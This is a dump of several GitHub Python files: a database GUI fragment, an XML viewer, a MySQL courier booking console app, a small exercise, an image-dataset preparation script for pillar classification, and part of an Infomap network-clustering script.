command=select_database)\ndelete_db = Button(text='Delete database', command=delete_database)\ndetail_db = Button(text='Details', command=details)\nclear_db = Button(text='Clear database', command=clear_all_tables)\n\n\ndb_listbox.place(anchor=N, x=150, y=25)\ncreate_db.place(anchor=NW, x=250, y=25)\n# select_db.place(anchor=NW, x=250, y=55)\ndelete_db.place(anchor=NW, x=250, y=55)\ndetail_db.place(anchor=NW, x=250, y=85)\nclear_db.place(anchor=NW, x=250, y=115)\n\n\nroot.mainloop()\n","repo_name":"dsawfer/SQL-App","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22048398078","text":"\"\"\"\nXMLView GUI-onafhankelijke code\n\"\"\"\n\nimport os\n# import pathlib\n## import sys\nimport shutil\nimport xml.etree.ElementTree as et\n# import logging\n\nfrom .shared import ELSTART, log\nfrom .base import find_in_flattened_tree, parse_nsmap\nfrom .gui import Gui\nTITEL = \"Albert's (Simple) XML viewer\"\n# NEW_ROOT = '(new root)'\n\n\nclass Viewer():\n \"Applicatievenster zonder GUI-specifieke methoden\"\n def __init__(self, fname):\n self.title = \"Albert's XML Viewer\"\n self.xmlfn = os.path.abspath(fname) if fname else ''\n self.gui = Gui(self, fname, readonly=True)\n self.search_args = []\n self._search_pos = None\n self.gui.init_gui()\n if self.xmlfn:\n try:\n tree, prefixes, uris = parse_nsmap(self.xmlfn)\n except (IOError, et.ParseError) as err:\n self.gui.meldfout(str(err), abort=True)\n self.init_tree(None)\n return # None\n else:\n self.init_tree(tree.getroot(), prefixes, uris)\n self.gui.go()\n\n def check_tree(self):\n \"nodig omdat de gui module deze aanroept\"\n return True\n\n def get_menu_data(self):\n \"\"\"return menu structure for GUI (title, callback, keyboard shortcut(s))\n \"\"\"\n return (((\"&Open\", self.openxml, 'Ctrl+O'),\n ('E&xit', self.gui.quit, 'Ctrl+Q'), ),\n ((\"&Expand All (sub)Levels\", self.expand, 'Ctrl++'),\n (\"&Collapse All (sub)Levels\", self.collapse, 'Ctrl+-'), ),\n ((\"&Find\", self.search, 'Ctrl+F'),\n (\"Find &Last\", self.search_last, 'Shift+Ctrl+F'),\n (\"Find &Next\", self.search_next, 'F3'),\n (\"Find &Previous\", self.search_prev, 'Shift+F3')))\n\n def init_tree(self, root, prefixes=None, uris=None, name=''):\n \"set up display tree\"\n def add_to_tree(el, rt):\n \"recursively add elements\"\n rr = self.add_item(rt, el.tag, el.text)\n ## log(calculate_location(self, rr))\n for attr in el.keys():\n h = el.get(attr)\n if not h:\n h = '\"\"'\n self.add_item(rr, attr, h, attr=True)\n for subel in list(el):\n add_to_tree(subel, rr)\n if name:\n titel = name\n elif self.xmlfn:\n titel = self.xmlfn\n else:\n titel = '[unsaved file]'\n self.top = self.gui.setup_new_tree(titel)\n self.rt = root\n self.ns_prefixes = prefixes or []\n self.ns_uris = uris or []\n self.gui.set_windowtitle(\" - \".join((os.path.basename(titel), TITEL)))\n if root is None: # explicit test needed, empty root element is falsey\n return\n # eventuele namespaces toevoegen\n namespaces = False\n for ix, prf in enumerate(self.ns_prefixes):\n if not namespaces:\n ns_root = self.gui.add_node_to_parent(self.top)\n self.gui.set_node_title(ns_root, 'namespaces')\n # ns_root = qtw.QTreeWidgetItem(['namespaces'])\n namespaces = True\n ns_item = self.gui.add_node_to_parent(ns_root)\n self.gui.set_node_title(ns_item, '{}: {}'.format(prf, self.ns_uris[ix]))\n rt = self.add_item(self.top, self.rt.tag, self.rt.text)\n for attr in self.rt.keys():\n h = self.rt.get(attr)\n if not h:\n h = '\"\"'\n self.add_item(rt, attr, h, attr=True)\n for el in list(self.rt):\n add_to_tree(el, rt)\n # self.tree.selection = self.top\n # set_selection()\n self.replaced = {} # dict of nodes that have been replaced while editing\n self.gui.expand_item(self.top)\n\n def getshortname(self, data, attr=False):\n \"\"\"build and return a name for this node\n \"\"\"\n fullname, value = data\n text = ''\n if attr:\n text = value.rstrip('\\n')\n elif value:\n text = value.split(\"\\n\", 1)[0]\n max = 60\n if len(text) > max:\n text = text[:max].lstrip() + '...'\n if fullname.startswith('{'):\n uri, localname = fullname[1:].split('}')\n for i, ns_uri in enumerate(self.ns_uris):\n if ns_uri == uri:\n prefix = self.ns_prefixes[i]\n break\n fullname = ':'.join((prefix, localname))\n strt = ' '.join((ELSTART, fullname))\n if attr:\n return \" = \".join((fullname, text))\n elif text:\n return \": \".join((strt, text))\n return strt\n\n def add_item(self, to_item, name, value, before=False, below=True, attr=False):\n \"\"\"execute adding of item\"\"\"\n log('in add_item for {} value {} to {} before is {} below is {}'.format(\n name, value, to_item, before, below))\n if value is None:\n value = \"\"\n itemtext = self.getshortname((name, value), attr)\n if below:\n add_under = to_item\n insert = -1\n if not itemtext.startswith(ELSTART):\n itemlist = self.gui.get_node_children(to_item)\n for seq, subitem in enumerate(itemlist):\n if self.gui.get_node_title(subitem).startswith(ELSTART):\n break\n if itemlist and seq < len(itemlist):\n insert = seq\n else:\n add_under, insert = self.gui.get_node_parentpos(to_item)\n print('in base.add_item (not below), insert is', insert)\n if not before:\n insert += 1\n print('in base.add_item after correction, insert is', insert)\n item = self.gui.add_node_to_parent(add_under, insert)\n self.gui.set_node_title(item, itemtext)\n self.gui.set_node_data(item, name, value)\n return item\n\n def flatten_tree(self, element):\n \"\"\"return the tree's structure as a flat list\n probably nicer as a generator function\n \"\"\"\n attr_list = []\n # print('in flatten tree: node title', self.gui.get_node_title(element))\n # print('in flatten tree: node data', self.gui.get_node_data(element))\n try:\n title, data = self.gui.get_node_data(element)\n except TypeError:\n title = data = ''\n if not data:\n data = ('', '')\n elem_list = [(element, title, data, attr_list)]\n\n subel_list = []\n for subel in self.gui.get_node_children(element):\n if self.gui.get_node_title(subel).startswith(ELSTART):\n subel_list = self.flatten_tree(subel)\n elem_list.extend(subel_list)\n else:\n # attr_list.append((subel, *self.gui.get_node_data(subel)))\n x, y = self.gui.get_node_data(subel)\n attr_list.append((subel, x, y))\n # for item in elem_list:\n # print(item)\n return elem_list\n\n def find_first(self, reverse=False):\n \"start search after asking for options\"\n # from_contextmenu = self.checkselection(message=False)\n if self.gui.get_search_args():\n # TODO: bij contextmenu rekening houden met positie huidige item\n # if from_contextmenu:\n self.item = self.gui.get_selected_item() # self.tree.Selection\n self._search_pos = self.item, None\n self.find_next(reverse)\n\n def find_next(self, reverse=False):\n \"find (default is forward)\"\n if self._search_pos is None:\n self.gui.meldinfo('You need to \"Find\" something first')\n return\n found, is_attr = find_in_flattened_tree(self.flatten_tree(self.top), self.search_args,\n reverse, self._search_pos)\n if found:\n self.gui.set_selected_item(found)\n self._search_pos = (found, is_attr)\n else:\n self.gui.meldinfo('Niks (meer) gevonden')\n\n def openxml(self, event=None):\n \"load XML file (after checking if current needs to be saved)\"\n ok, fname = self.gui.file_to_read()\n if ok:\n try:\n tree, prefixes, uris = parse_nsmap(fname)\n except et.ParseError as e:\n self.gui.meldfout(str(e))\n else:\n self.xmlfn = fname\n self.init_tree(tree.getroot(), prefixes, uris)\n\n def expand(self, event=None):\n \"\"\"show all children of the current node\n \"\"\"\n self.gui.expand_item()\n\n def collapse(self, event=None):\n \"\"\"hide all children of the current node\n \"\"\"\n self.gui.collapse_item()\n\n def search(self, event=None):\n \"start forward search\"\n self.find_first()\n\n def search_last(self, event=None):\n \"start backwards search\"\n self.find_first(reverse=True)\n\n def search_next(self, event=None):\n \"find forward\"\n self.find_next()\n\n def search_prev(self, event=None):\n \"find backwards\"\n self.find_next(reverse=True)\n\n @staticmethod\n def get_search_text(ele, attr_name, attr_val, text):\n \"build text describing search arguments\"\n attr = attr_name or attr_val\n out = ['search for'] if any((ele, attr, text)) else ['']\n has_text = ' that has'\n name_text = ' a name'\n value_text = ' a value'\n contain_text = ' containing `{}`'\n if ele:\n ele_out = [' an element' + has_text + name_text, contain_text.format(ele)]\n if attr:\n attr_out = [' an attribute' + has_text]\n if attr_name:\n attr_out[0] += name_text\n attr_out.append(contain_text.format(attr_name))\n if attr_val:\n if not attr_name:\n attr_out[0] += value_text\n else:\n attr_out.append(' and' + value_text)\n attr_out.append(contain_text.format(attr_val))\n if ele:\n attr_out[0] = ' with' + attr_out[0]\n if text:\n out[0] += ' text'\n out.append(' `{}`'.format(text))\n if ele:\n ele_out[0] = ' under' + ele_out[0]\n out += ele_out\n elif attr:\n out += [' under an element with']\n if attr:\n out += attr_out\n elif ele:\n out += ele_out\n if attr:\n out += attr_out\n elif attr:\n attr_out[0] = out[0] + attr_out[0]\n out = attr_out\n return out\n\n def about(self, event=None):\n \"Credits\"\n self.gui.meldinfo(\"Started in 2008 by Albert Visser\\nWritten in Python\")\n","repo_name":"albertvisser/axe","sub_path":"axe/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":10739,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"32212533400","text":"import mysql.connector\n\nimport datetime # To get the current date and time\n\n# con: The primary connection to the existing up and running MySQL server.\n# cur: The primary cursor used to interact with the MySQL server.\nCon = mysql.connector.connect(user='root', password='root', database='courier', host='localhost')\nif not Con.is_connected():\n print(\"Error connecting to MySQL database! Please check your environment setup.\")\nCur = Con.cursor()\n\n# CourierCount: Used to track the count of the number of couriers and assign IDs automatically.\n# Initial value is the count of the couriers in the database.\n\nCourierCount = 0\n\ndef setup():\n TABLE_BUILD_CMDS = [\n # Users table\n \"CREATE TABLE users(Username CHAR(30) PRIMARY KEY, Password CHAR(30))\",\n\n # Couriers table\n \"CREATE TABLE couriers(CourierID CHAR(5) PRIMARY KEY, CustomerID CHAR(30) NOT NULL,\"\\\n \"FromLoc TEXT, ToLoc TEXT,\"\\\n \"ServiceTier CHAR(10), RequestDate DATE, FOREIGN KEY(CustomerID) REFERENCES users(Username))\"\n ]\n for cmd in TABLE_BUILD_CMDS:\n try:\n Cur.execute(cmd)\n except mysql.connector.Error as err:\n print(err.msg)\n pass\n Con.commit()\n\n global CourierCount\n Cur.execute(\"SELECT COUNT(*) FROM couriers;\")\n CourierCount = int(Cur.fetchone()[0])\n\ndef cleanup():\n TABLE_DESTROY_CMDS = [\n \"DROP TABLE couriers;\",\n \"DROP TABLE users;\",\n ]\n for CMD in TABLE_DESTROY_CMDS:\n try:\n Cur.execute(CMD)\n except mysql.connector.Error:\n pass\n Con.commit()\n\ndef rebuild():\n if input(\"Rebuilding the database destroys all the tables and rebuilds them.\\n\"\n \"If the data stored is not backed up, loss of data is imminent.\\n\"\n \"Do you still wish to continue? (yes/no): \").strip().lower() == \"yes\":\n cleanup()\n setup()\n\ndef _getUsers():\n Cur.execute(\"SELECT * FROM users\")\n return Cur.fetchall()\n\ndef signUp():\n while True:\n print('-'*30)\n print(\"SIGNUP\")\n username = input(\"Enter your username: \").strip()\n password = input(\"Enter your password: \").strip()\n for user in _getUsers():\n if user[0] == username:\n print(\"Username already taken! Please enter a different username and try again!\")\n continue\n Cur.execute(\"INSERT INTO users VALUES(%s, %s)\", (username, password))\n break\n Con.commit()\n\nLoginInformation = None\n\ndef login():\n username = input(\"Enter your username: \").strip()\n password = input(\"Enter your password: \").strip()\n Cur.execute(\"SELECT Username FROM users WHERE Username=%s AND Password=%s\", (username, password))\n if Cur.fetchall() == []:\n print(\"Invalid username/password combo!\")\n else:\n global LoginInformation\n print(\"Successfully logged in as\", username, \"!\")\n LoginInformation = {\"Username\": username, \"Password\": password}\n\ndef sendCourier():\n global LoginInformation, CourierCount\n if LoginInformation == None:\n print(\"You need to login before sending a courier! Please login!\")\n return\n print(\"Sending courier as\", LoginInformation[\"Username\"])\n fromLoc = input(\"Enter from location: \")\n toLoc = input(\"Enter to location: \")\n requestDate = datetime.date.today().isoformat()\n print(\"Enter the service tier you would like to opt:\"\\\n \" 1) Standard - Basic courier service with International shipping.\",\\\n \" 2) Prime - Faster delivery ( + INR 1500.00 )\",\\\n \" 3) PrimePlus - Fastest delivery and 5\\% off of your next 3 couriers! ( + INR 2500.00 )\", sep=\"\\n\")\n serviceTierChoice = int(input(\"Enter your choice: \").strip())\n serviceTier = None\n if serviceTierChoice == 1:\n serviceTier = \"Standard\"\n elif serviceTierChoice == 2:\n serviceTier = \"Prime\"\n elif serviceTierChoice == 3:\n serviceTier = \"PrimePlus\"\n else:\n print(\"Invalid service tier choice\", serviceTierChoice, \"! Cancelling last request!\")\n return\n print(\"Selecting service tier\", serviceTier)\n CourierCount += 1\n courierId = CourierCount\n Cur.execute(\"INSERT INTO couriers VALUES(%s, %s, %s, %s, %s, %s)\", \\\n (courierId, LoginInformation[\"Username\"], fromLoc, toLoc, serviceTier, requestDate))\n print(\"Successfully sent courier! Your courier ID is\", courierId)\n Con.commit()\n\ndef _getAllCouriers():\n global LoginInformation\n Cur.execute(\"SELECT * FROM couriers WHERE CustomerID=%s;\", (LoginInformation[\"Username\"],))\n couriers = Cur.fetchall()\n if couriers == []:\n print(\"You haven't sent out any couriers yet. Try sending one now! :D\")\n return couriers\n\ndef printCouriers(couriers):\n if couriers == []:\n return\n print('-' * 67)\n print(\"| {} | {} | {} | {} | {} |\".format(\\\n \"SlNo\".rjust(4), \"From\".rjust(10), \"To\".rjust(10), \\\n \"Date of Sending\", \"Service Tier\"))\n print('-' * 67)\n for courier in couriers:\n print(\"| {} | {} | {} | {} | {} |\".\\\n format(courier[0].rjust(4), \\\n courier[2].rjust(10), courier[3].rjust(10), \\\n str(courier[5]).rjust(15), courier[4].rjust(12)))\n print('-' * 67)\n\n\ndef trackCourier():\n courierId = int(input(\"Enter your courier ID: \").strip())\n Cur.execute(\"SELECT * FROM couriers WHERE CourierID=%s\", (courierId,))\n dat = Cur.fetchone()\n if dat == ():\n print(\"No courier with the given ID!\")\n else:\n global LoginInformation\n if dat[1] != LoginInformation[\"Username\"]:\n print(\"Mismatch between currently logged in user and the user who sent the courier!\",\n \"Please login as the user who sent the courier to track it!\")\n else:\n print((\"Courier ID: {}\\nService Tier: {}\\nFrom location: \" +\\\n \"{}\\nTo location: {}\\nDate of sending: {}\")\\\n .format(dat[0], dat[4], dat[2], dat[3], dat[5]))\n\ndef searchCourier():\n global LoginInformation\n couriers = []\n choice = int(input(\"Would you like to search by\"+\\\n \"(1) from location or (2) to location? (1/2): \"))\n if choice == 1:\n fromLoc = input(\"Enter from location: \").strip()\n Cur.execute(\"SELECT * FROM couriers WHERE CustomerID=%s\"\\\n \"AND FromLoc LIKE %s\",\\\n (LoginInformation[\"Username\"], fromLoc))\n couriers = Cur.fetchall()\n elif choice == 2:\n toLoc = input(\"Enter to location: \").strip()\n Cur.execute(\"SELECT * FROM couriers WHERE CustomerID=%s\"\\\n \"AND ToLoc LIKE %s\", \\\n (LoginInformation[\"Username\"], toLoc))\n couriers = Cur.fetchall()\n else:\n return\n if couriers == []:\n print(\"Search results empty :(\")\n else:\n printCouriers(couriers)\n\ndef manageCouriers():\n if LoginInformation == None:\n print(\"You need to login in order manage your couriers!\")\n return\n while True:\n print('#' * 25)\n print(\"Manage your couriers\")\n print(\" 1) View all your couriers\")\n print(\" 2) Track a courier\")\n print(\" 3) Search courier by from or to location\")\n print(\" *) Go back\")\n choice = int(input(\"Enter your choice: \"))\n if choice == 1:\n printCouriers(_getAllCouriers())\n elif choice == 2:\n trackCourier()\n elif choice == 3:\n searchCourier()\n else:\n break\n\n#################### Main logic ####################\n\nsetup()\n\nwhile True:\n print('\\n', ('#' * 30))\n print(\"Welcome to control panel!\")\n print(\" 1) Sign up\")\n print(\" 2) Log in\")\n print(\" 3) Send a courier\")\n print(\" 4) Manage your couriers\")\n print(\" 5) Admin tools: Rebuild the database\")\n print(\" *) Exit\")\n choice = int(input(\"Enter your choice: \"))\n if choice == 1:\n signUp()\n elif choice == 2:\n login()\n elif choice == 3:\n sendCourier()\n elif choice == 4:\n manageCouriers()\n elif choice == 5:\n rebuild()\n else:\n break\n\nCon.close()\n \n####################################################\n","repo_name":"dotslashinit-sh/CS-Courier-System","sub_path":"courier.py","file_name":"courier.py","file_ext":"py","file_size_in_byte":8139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15532755311","text":"iterations = int(input())\nbest_result = 0\nwinning_snow = 0\nwinning_time = 0\nwinning_quality = 0\nfor ball in range(1, iterations + 1):\n snowball_snow = int(input())\n snowball_time = int(input())\n snowball_quality = int(input())\n formula = (snowball_snow / snowball_time) ** snowball_quality\n if formula > best_result:\n best_result = formula\n winning_snow = snowball_snow\n winning_time = snowball_time\n winning_quality = snowball_quality\nprint(f\"{winning_snow} : {winning_time} = {best_result:.0f} ({winning_quality})\")\n","repo_name":"karalkal/SoftUni_Python_Fundamentals","sub_path":"02_Data_Types_and_Variables/2_exercises/ex9_snowballs.py","file_name":"ex9_snowballs.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72282136164","text":"import os\nimport sys\nimport gc\nimport cv2\nimport numpy\nimport pandas\nfrom tensorflow import keras\nfrom keras.models import load_model\n\nsys.path.append(os.path.abspath('../lib'))\nimport imageDraw\nimport imageProcess\n\n############################################################\n# GENERATE A BIGGER TRAINING DATASET FOR IMROVED ML MODEL\n# THE CLASSIFICATION WILL BE DONE USING THE ALREADY TRAINED MODEL\n# FIND OUT IF THE PILLAR IS COLLAPSED USING EXISTING ML MODEL\n############################################################\n# excelFileName = 'classifyPillars.xlsx'\n# sheetNameList = ['trainingData']\n# model = keras.models.load_model('../model/model_01_intermediate_487_accuracy_trainAcc_99.94_testAcc_99.85.h5')\n\n# for sheetName in sheetNameList:\n # print('Processing %s sheet' %(sheetName))\n # df = pandas.read_excel(excelFileName,sheet_name=sheetName,names=['inputFile','colTopLeft','rowTopLeft','colTopRight','rowTopRight','colBottomRight','rowBottomRight','colBottomLeft','rowBottomLeft','numPillarsInRow','numPillarsInCol'],inplace=True)\n \n # outFile = open(sheetName+'.dat','w')\n # outFile.write('InputFile\\tTag\\tPillarID\\tCropStartRow\\tCropStartCol\\tCropEndRow\\tCropEndCol\\tClassificationClass\\tClassificationClassLabel\\n')\n # for inputFile,colTopLeft,rowTopLeft,colTopRight,rowTopRight,colBottomRight,rowBottomRight,colBottomLeft,rowBottomLeft,numPillarsInRow,numPillarsInCol in df.values:\n # cropSize = int(round(max(2.0*0.75*(colTopRight-colTopLeft)/(numPillarsInRow-1),2.0*0.75*(rowBottomLeft-rowTopLeft)/(numPillarsInCol-1))))\n # if ('.dm3' in inputFile):\n # outputFile = inputFile.replace('.dm3','.png')\n # elif ('.dm4' in inputFile):\n # outputFile = inputFile.replace('.dm4','.png')\n # print('Processing %s' %(inputFile))\n # tag = inputFile.split('/')[-2]\n \n # gImg = imageProcess.readDM4(inputFile)\n # [row,col] = gImg.shape\n # gImgNorm = imageProcess.normalize(gImg,min=30,max=230)\n \n # topRowPillarCentre = numpy.column_stack((\\\n # numpy.linspace(rowTopLeft,rowTopRight,numPillarsInRow),\\\n # numpy.linspace(colTopLeft,colTopRight,numPillarsInRow)))\n # bottomRowPillarCenter = numpy.column_stack((\\\n # numpy.linspace(rowBottomLeft,rowBottomRight,numPillarsInRow),\\\n # numpy.linspace(colBottomLeft,colBottomRight,numPillarsInRow)))\n \n # pillarID = 0\n # for coordTop,coordBottom in zip(topRowPillarCentre,bottomRowPillarCenter):\n # pillarColumnCoord = numpy.column_stack((numpy.linspace(coordTop[0],coordBottom[0],numPillarsInCol),numpy.linspace(coordTop[1],coordBottom[1],numPillarsInCol)))\n # for r,c in pillarColumnCoord:\n # cropRowStart,cropColStart = int(round(r-cropSize/2)),int(round(c-cropSize/2))\n # cropRowEnd,cropColEnd = int(cropRowStart+cropSize),int(cropColStart+cropSize)\n # if (cropRowStart>=0 and cropColStart>=0 and cropRowEnd<=row and cropColEnd<=col):\n # pillarID += 1\n # gImgCrop = gImg[cropRowStart:cropRowEnd+1,cropColStart:cropColEnd+1]\n # gImgCrop = cv2.resize(gImgCrop,(32,32),interpolation=cv2.INTER_AREA)\n \n # gImgCrop = gImgCrop.copy().astype('float32')\n # gImgCrop /= 255\n # gImgCrop = gImgCrop.reshape(1,32,32,1)\n # res = model.predict_classes(gImgCrop,batch_size=1)[0]\n # keras.backend.clear_session()\n # if (res==0):\n # gImgNorm = imageDraw.circle(gImgNorm,(r,c),radius=int(cropSize/4),thickness=12,color=255)\n # label = 'Collapse'\n # elif (res==1):\n # gImgNorm = imageDraw.circle(gImgNorm,(r,c),radius=int(cropSize/4),thickness=12,color=0)\n # label = 'Not collapse'\n # outFile.write('%s\\t%s\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\t%s\\n' %(inputFile,tag,pillarID,cropRowStart,cropColStart,cropRowEnd,cropColEnd,res,label))\n # cv2.imwrite(outputFile,gImgNorm)\n # del df,inputFile,colTopLeft,rowTopLeft,colTopRight,rowTopRight,colBottomRight,rowBottomRight,colBottomLeft,rowBottomLeft,numPillarsInRow,numPillarsInCol,cropSize,outputFile,tag,gImg,gImgNorm,row,col,topRowPillarCentre,bottomRowPillarCenter\n # gc.collect()\n # outFile.close()\n# del excelFileName,sheetNameList,model,sheetName\n# gc.collect()\n############################################################\n\n\n############################################################\n# MANUALLY FIX THE CLASSIFICATION DONE USING THE OLD ML MODEL\n# PREPARE A NEW TRAINING DATASET FOR CLASSIFICATION\n############################################################\nexcelFileName = 'classifyPillars.xlsx'\nsheetNameList = ['trainingData']\n\nfor sheetName in sheetNameList:\n print('Processing %s sheet' %(sheetName))\n df = pandas.read_excel(excelFileName,sheet_name=sheetName,names=['inputFile','colTopLeft','rowTopLeft','colTopRight','rowTopRight','colBottomRight','rowBottomRight','colBottomLeft','rowBottomLeft','numPillarsInRow','numPillarsInCol'],inplace=True)\n \n outFile = open('/home/utkarsh/Projects/PillarClassification/dataset/newLabelledDataset.dat','w')\n outFile.write('Label (Collapse=0, Not collapse=1)\\tImage array\\n')\n for inputFile,colTopLeft,rowTopLeft,colTopRight,rowTopRight,colBottomRight,rowBottomRight,colBottomLeft,rowBottomLeft,numPillarsInRow,numPillarsInCol in df.values:\n print('Processing %s' %(inputFile))\n if ('.dm3' in inputFile):\n pngFile = inputFile.replace('.dm3','.png')\n classifiedpngFile = inputFile.replace('.dm3','_manual.png')\n elif ('.dm4' in inputFile):\n pngFile = inputFile.replace('.dm4','.png')\n classifiedpngFile = inputFile.replace('.dm4','_manual.png') \n \n cropSize = int(round(max(2.0*0.75*(colTopRight-colTopLeft)/(numPillarsInRow-1),2.0*0.75*(rowBottomLeft-rowTopLeft)/(numPillarsInCol-1))))\n gImg = imageProcess.readDM4(inputFile)\n gImgClassified = cv2.imread(classifiedpngFile,0)\n [row,col] = gImg.shape\n \n topRowPillarCentre = numpy.column_stack((\\\n numpy.linspace(rowTopLeft,rowTopRight,numPillarsInRow),\\\n numpy.linspace(colTopLeft,colTopRight,numPillarsInRow)))\n bottomRowPillarCenter = numpy.column_stack((\\\n numpy.linspace(rowBottomLeft,rowBottomRight,numPillarsInRow),\\\n numpy.linspace(colBottomLeft,colBottomRight,numPillarsInRow)))\n \n for coordTop,coordBottom in zip(topRowPillarCentre,bottomRowPillarCenter):\n pillarColumnCoord = numpy.column_stack((numpy.linspace(coordTop[0],coordBottom[0],numPillarsInCol),numpy.linspace(coordTop[1],coordBottom[1],numPillarsInCol)))\n for r,c in pillarColumnCoord:\n cropRowStart,cropColStart = int(round(r-cropSize/2)),int(round(c-cropSize/2))\n cropRowEnd,cropColEnd = int(cropRowStart+cropSize),int(cropColStart+cropSize)\n if (cropRowStart>=0 and cropColStart>=0 and cropRowEnd<=row and cropColEnd<=col):\n gImgCrop = gImg[cropRowStart:cropRowEnd+1,cropColStart:cropColEnd+1]\n gImgCropClassified = gImgClassified[cropRowStart:cropRowEnd+1,cropColStart:cropColEnd+1]\n bImgCollapse = gImgCropClassified==255; bImgCollapse = imageProcess.removeBoundaryParticles(bImgCollapse)\n bImgNotCollapse = gImgCropClassified==0; bImgNotCollapse = imageProcess.removeBoundaryParticles(bImgNotCollapse)\n bImgCollapseSum,bImgNotCollapseSum = numpy.sum(bImgCollapse),numpy.sum(bImgNotCollapse)\n if (bImgCollapseSum > bImgNotCollapseSum):\n outFile.write('0\\t')\n else:\n outFile.write('1\\t')\n gImgCrop = cv2.resize(gImgCrop,(64,64),interpolation=cv2.INTER_LINEAR)\n for pixel in gImgCrop.flatten()[:-1]:\n outFile.write('%d\\t' %(pixel))\n outFile.write('%d\\n' %(gImgCrop.flatten()[-1]))\n outFile.close()\ndel excelFileName,sheetNameList,sheetName\ngc.collect()\n############################################################\n","repo_name":"uanand/PillarClassification","sub_path":"main/prepareNewTrainingDataset.py","file_name":"prepareNewTrainingDataset.py","file_ext":"py","file_size_in_byte":8391,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"18774802402","text":"\"\"\"\nAuthor: Nolan K Newman \nLast updated: 7/19/23\n\nWritten/tested in Python v3.8.10\n\nDescription:\nTakes a network and uses Infomap to assign cluster numbers. Infomap clustering is performed for each data type in the network.\n\n\"\"\"\n\nimport pickle\nimport argparse\nimport networkx as nx\nfrom infomap import Infomap\nimport csv\nimport collections\nimport os\n \nif __name__ == '__main__':\n\n def import_outside_nw(fname):\n '''\n Function to import the network into script if network was reconstructed via alternative methods other than TkNA\n \n Arguments:\n - fname: the name of the file\n '''\n row_count = 0 \n G = nx.Graph()\n \n with open(fname) as csvfile: \n file = csv.reader(csvfile, delimiter = ',')\n \n for row in file:\n \n #print(row)\n \n # Take the index of the source and target node in the header of the file\n if row_count == 0: \n p1 = int(row.index(\"partner1\"))\n \n p2 = int(row.index(\"partner2\"))\n \n parameter1 = row[p1]\n parameter2 = row[p2] \n \n # Find each node that made it into the final network and the direction of the edge \n if row_count != 0:\n G.add_edge(parameter1, parameter2)\n \n row_count += 1\n \n csvfile.close() \n return(G)\n \n # Function that takes as input the mapping file from the user and creates a dictionary of the type for each node. Then, for the nodes that are in the network input file, it assigns types to them based on the typing from the mapping file. \n def assign_node_type(node_list_file): \n '''\n Function that takes as input the mapping file from the user and creates a dictionary of the type for each node. Then, for the nodes that are in the network input file, it assigns types to them based on the typing from the mapping file. \n \n Arguments:\n - node_list_file: the mapping file supplied by the user\n '''\n \n node_type_dict = collections.defaultdict(list)\n\n # Add all node-type pairs from the input file into the node_type_dict\n with open(node_list_file) as node_file:\n node_file = csv.reader(node_file, delimiter = ',')\n \n for row in node_file:\n node_type_dict[row[1]].append(row[0])\n \n return(node_type_dict)\n \n\n def infomap_partition(G, type_dict, subnw):\n '''\n Assigns nodes to subnetworks within user-defined subnetworks \n \n Arguments:\n - G: the entire network\n - type_dict: dictionary that includes the node names as keys and the user-defined subnetwork as values\n - subnw: the user-defined subnetwork that is currently being analyzed\n '''\n im = Infomap()\n # make node-to-int and int-to-node dictionaries\n \n # Extract just the nodes from the subnetwork being analyzed\n subnw_nodes = type_dict[subnw] \n subnw_graph = nx.subgraph(G, subnw_nodes)\n \n j = 0\n node_to_int = {}\n int_to_node = {}\n for n in subnw_graph.nodes():\n node_to_int[n] = j\n int_to_node[j] = n\n j += 1\n \n # copy the edges into InfoMap\n for e in subnw_graph.edges():\n im.add_link(node_to_int[e[0]],node_to_int[e[1]])\n \n # now run in silent mode\n #options_string = '--silent --preferred-number-of-modules '+str(n_mod)\n options_string = '--silent'\n im.run(options_string)\n \n # set up the node->community id dictionary\n partition = {}\n for node in im.tree:\n if node.is_leaf:\n partition[int_to_node[node.node_id]] = node.module_id - 1\n return im.codelength,partition\n \n \n parser = argparse.ArgumentParser(description=\"Example command: python ./analysis/infomap_assignment.py --network --network-format --map --out-dir \", add_help=False)\n\n requiredArgGroup = parser.add_argument_group('Required arguments') \n requiredArgGroup.add_argument(\"--network\", type=str, help=\"The path to the network file, either in .pickle or .csv format; see --network-format\", required=True)\n requiredArgGroup.add_argument(\"--network-format\", type=str, dest=\"network_format\", choices=['pickle', 'csv'], help=\"Format of the network file; Either use 'pickle' with the network.pickle file output made by assess_network.py (if network was reconstructed using the TkNA pipeline) or 'csv' if the network was reconstructed using an alternative pipeline (must be in .csv format and have 'partner1' and 'partner2' as the headers for the two node columns)\", required=True)\n requiredArgGroup.add_argument(\"--map\", help = 'CSV file with the name of the node in the first column and its data type in the second column (i.e. ENSMUSG00000030708, gene).', required=True)\n requiredArgGroup.add_argument(\"--out-dir\", type=str, dest = \"outdir\", help=\"Path to output directory\", required=True)\n\n optionalArgGroup = parser.add_argument_group('Optional arguments') \n optionalArgGroup.add_argument(\"-h\", \"--help\", action=\"help\", help=\"Show this help message and exit\")\n \n args = parser.parse_args()\n outdir = args.outdir\n \n if not outdir[-1] == \"/\":\n outdir = outdir + \"/\"\n \n if not os.path.exists(outdir):\n os.makedirs(outdir) \n \n #Main driver of the code\n \n # Load in the network\n if args.network_format == 'pickle':\n # Unpack the pickle\n p = open(args.network, \"rb\")\n p = pickle.load(p)\n G = p\n \n network_name = args.network.split(\"/\")[-1]\n network_name = network_name[:-7] # remove the pickle extension from file name \n \n elif args.network_format == 'csv':\n G = import_outside_nw(args.network)\n \n network_name = args.network.split(\"/\")[-1] \n network_name = network_name[:-4] # remove the csv extension from file name \n\n # Assign each node a node type so infomap is run separately on each type\n node_type_dict = assign_node_type(args.map)\n\n # dict of infomap outputs, keyed on subnetwork name and values are list of infomap_partition results\n im_outputs = {}\n\n with open(outdir + network_name + \"_infomap_partition.csv\", \"w\") as file:\n file.write(\"Node,Subnetwork_partition\\n\")\n \n for subnet in node_type_dict.keys():\n print(\"Performing infomap in the \" + subnet + \" subnetwork...\")\n im_outputs[subnet] = 